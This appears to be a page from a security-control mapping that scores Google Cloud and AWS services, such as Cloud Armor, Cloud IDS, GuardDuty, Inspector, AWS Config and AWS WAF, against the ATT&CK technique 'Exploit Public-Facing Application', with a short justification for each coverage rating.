                              mandiant_asm Mandiant Attack Surface Management (ASM) technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Mandiant Attack Surface Management continuously discovers and assesses an organization's assets for vulnerabilities, misconfigurations, and exposures. This control can discover vulnerable Remote Services offered on the cloud or on hosted servers. Since this monitoring is continual and is derived from Mandiant cyber threat intelligence, this control is scored as significant.
                              References
                              artifact_analysis Artifact Analysis technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Artifact Analysis performs vulnerability scans on artifacts in Artifact Registry or Container Registry (deprecated). When Artifact Analysis is deployed, it can detect known vulnerabilities in various Linux OS packages. This information can be used to patch, isolate, or remove vulnerable software and machines. This control does not directly protect against exploitation and is not effective against zero day attacks, vulnerabilities with no available patch, and other end-of-life packages.
                              References
                              cloud_armor Cloud Armor technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Google Cloud Armor security policies protect your application by providing Layer 7 filtering and by scrubbing incoming requests for common web attacks or other Layer 7 attributes. Google Cloud Armor detects malicious requests and drops them at the edge of Google's infrastructure.
                              References
                              cloud_ids Cloud IDS technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Adversaries often take advantage of software weaknesses in web applications; the Palo Alto Networks vulnerability signatures used by Cloud IDS can detect SQL injection attacks that attempt to read or modify a system database using common web hacking techniques (e.g., OWASP Top 10). Although there are other ways an attacker could leverage web application weaknesses to affect sensitive data and databases, this technique was scored as Significant based on Palo Alto Networks' advanced threat detection technology, which is constantly updated to detect the latest known variations of these attacks.
                              References
                              google_secops Google Security Operations technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Google Security Ops triggers an alert based on suspicious behavior, such as exploitation attempts against web servers and/or applications (e.g., F5 BIG-IP CVE-2020-5902). This technique was scored as minimal based on a low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_1.yaral https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/proactive_exploit_detection/big_ip/possible_f5_big_ip_tmui_attack_cve_2020_5902_part_2.yaral
                              References
                              identity_aware_proxy Identity Aware Proxy technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              When an application or resource is protected by IAP, it can only be accessed through the proxy by principals (users) who hold the correct Identity and Access Management (IAM) role. IAP secures authentication and authorization of all requests to App Engine, Cloud Load Balancing (HTTPS), or internal HTTP load balancing. Because adversaries may attempt malicious activity through applications, gating applications behind IAP limits their exposure and can prevent exploit traffic from reaching the application.
                              References
                              security_command_center Security Command Center technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              Using Web Security Scanner, SCC is able to detect and provide guidance for web application security risks (e.g., Cross-Site Scripting, SQL injection, Server Side Request Forgery, Insecure Deserialization). Adversaries may exploit these web app weaknesses in a cloud-based environment to compromise the underlying instance or container. This technique was graded as Significant due to the high detection coverage against varying forms of this attack.
                              References
                              vm_manager VM Manager technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              VM Manager can apply on-demand and scheduled patches via automated patch deployment. This can remediate OS and software vulnerabilities that could otherwise be exploited. Since VM Manager doesn't directly prevent exploitation of active vulnerabilities (including zero day vulnerabilities) this control has resulted in a score of Partial.
                              References
                              vpc_service_controls VPC Service Controls technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              VPC security perimeters can segment private resources to further reduce user access and operate in a logically separate hosting environment.
                              References

                              AWS Mappings

                              Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
                              amazon_guardduty Amazon GuardDuty technique_scores T1190 Exploit Public-Facing Application
                              Comments
                              The GuardDuty finding type UnauthorizedAccess:EC2/MetadataDNSRebind captures cases where a vulnerable public-facing resource is leveraged to retrieve data not intended to be viewable (e.g., IAM credentials associated with the resource). Because this is the only relevant finding type, and it is focused on the EC2 instance rather than the application running on it, coverage is Minimal.
                              References
amazon_inspector Amazon Inspector technique_scores T1190 Exploit Public-Facing Application
Comments
Amazon Inspector can detect known vulnerabilities on various Windows and Linux endpoints. Furthermore, the Amazon Inspector Best Practices assessment package can assess the security controls "Enable Address Space Layout Randomization (ASLR)" and "Enable Data Execution Prevention (DEP)", which make it more difficult for an attacker to exploit vulnerabilities in software. This information can be used to patch, isolate, and remove vulnerable software and endpoints. Amazon Inspector does not directly protect against exploitation, and it is not effective against zero-day attacks, vulnerabilities with no available patch, or software that the scanner does not analyze. As a result, the score is capped at Partial.
References
aws_cloudendure_disaster_recovery AWS CloudEndure Disaster Recovery technique_scores T1190 Exploit Public-Facing Application
Comments
AWS CloudEndure Disaster Recovery enables the replication and recovery of servers into AWS Cloud. In the event that a public-facing application or server is compromised, AWS CloudEndure can be used to provision an instance of the server from a previous point in time within minutes. As a result, this mapping is given a score of Significant.
References
aws_config AWS Config technique_scores T1190 Exploit Public-Facing Application
Comments
The following AWS Config managed rules can identify configuration problems that should be fixed in order to ensure that applications intended for internal use cannot be accessed externally for exploitation: "api-gw-endpoint-type-check" can ensure that Amazon API Gateway APIs are private and can only be accessed from within VPCs; "elasticsearch-in-vpc-only" can ensure that Amazon ElasticSearch Service (Amazon ES) domains are in the same VPC and the domain endpoint is not public; "lambda-function-public-access-prohibited" can verify that AWS Lambda functions are not publicly available; and "ec2-instance-no-public-ip" can verify whether EC2 instances have public IP addresses.

The following AWS Config managed rules can identify configuration problems that should be fixed in order to ensure that insecure applications are not installed and installed packages are kept updated, reducing the likelihood of adversary exploitation: the "ec2-managedinstance-applications-blacklisted" managed rule verifies that a pre-defined list of applications is not installed on specified managed instances. It can be used to identify the presence of vulnerable applications (prompting removal before they can be exploited) and/or to identify the presence of allowed packages below a minimum version (prompting updates before they can be exploited). The "ec2-managedinstance-platform-check" managed rule verifies that managed instances are running desired platform types, including a desired version (as opposed to an out-of-date one). Both can reduce instances' attack surface for adversary exploitation. "rds-automatic-minor-version-upgrade-enabled" can verify that Amazon RDS is being patched, and "elastic-beanstalk-managed-updates-enabled" can verify that Elastic Beanstalk is being patched.

Coverage factor is partial for these rules, since they are specific to a subset of the available AWS services that can be used to host public-facing applications and will only protect against certain forms of identifiable exploitation, resulting in an overall score of Partial.
References
aws_rds AWS RDS technique_scores T1190 Exploit Public-Facing Application
Comments
AWS RDS supports the automatic patching of minor versions of database instances. This can result in security flaws in the database instances being fixed before they can be exploited. This mapping is given a score of Partial because it does not protect against misconfigured database instances, which may be susceptible to exploitation.
References
aws_rds AWS RDS technique_scores T1190 Exploit Public-Facing Application
Comments
AWS RDS supports the replication and recovery of database instances. In the event that a database instance is compromised, AWS RDS can be used to restore the database instance to a previous point in time. As a result, this mapping is given a score of Significant.
References
aws_security_hub AWS Security Hub technique_scores T1190 Exploit Public-Facing Application
Comments
AWS Security Hub reports on EC2 instances that are missing security patches for vulnerabilities which could enable an adversary to exploit vulnerabilities through the attack lifecycle. AWS Security Hub provides this detection with the following managed insight:

EC2 instances that have missing security patches for important vulnerabilities

This is scored as Partial because the checks associated with Security Hub only report on missing patches for known vulnerabilities. It does not cover zero-day vulnerabilities.
References
aws_web_application_firewall AWS Web Application Firewall technique_scores T1190 Exploit Public-Facing Application
Comments
AWS WAF protects public-facing applications against a range of vulnerabilities, including those listed in the OWASP Top 10. AWS WAF provides this protection via the following rule sets, which block malicious traffic across a variety of operating systems and applications:

AWSManagedRulesCommonRuleSet
AWSManagedRulesKnownBadInputRuleSet
AWSManagedRulesSQLiRuleSet
AWSManagedRulesLinuxRuleSet
AWSManagedRulesUnixRuleSet
AWSManagedRulesWindowsRuleSet
AWSManagedRulesPHPRuleSet
AWSManagedRulesWordPressRuleSet

This is given a score of Significant because it protects against vulnerabilities across multiple operating systems (Windows, Linux, POSIX) and technologies (JavaScript, SQL, PHP, WordPress). Furthermore, it blocks the malicious content in near real-time.
References